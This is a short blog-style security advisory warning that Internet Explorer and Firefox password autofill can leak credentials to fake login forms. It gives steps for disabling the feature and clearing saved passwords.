If you have your internet browser set to store your usernames and passwords, disable it immediately.

A vulnerability was just discovered in the both Microsoft’s Internet Explorer and Mozilla’s Firefox browsers which allows a hacker to create a fake login page. When your browser auto-fills the username and password into the form, the data is passed off to the hacker.

This vulnerability has been named a "reverse cross-site request" vulnerability by its discoverer, Robert Chapin. It has been found on at least one MySpace.com page and is a risk to any user who goes to forum or blog websites.

So far, there is no known fix except to disable the password fill-in feature.

  • In Microsoft Internet Explorer, use the menu to go to Tools/Internet Options. On the Content tab, select AutoComplete and make sure that "Usernames and passwords on forms" is not checked. (If the entire line is grayed out or "ghosted", you are okay.) You might want to click the "Clear Passwords" button while you’re here just in case there were some in history.
  • In Firefox, use the menu to go to Tools/Options. On the Security tab, make sure that "Remember passwords for sites" is not checked. Click on the "Show Passwords" button to remove any that have been saved previously.

Leave a Reply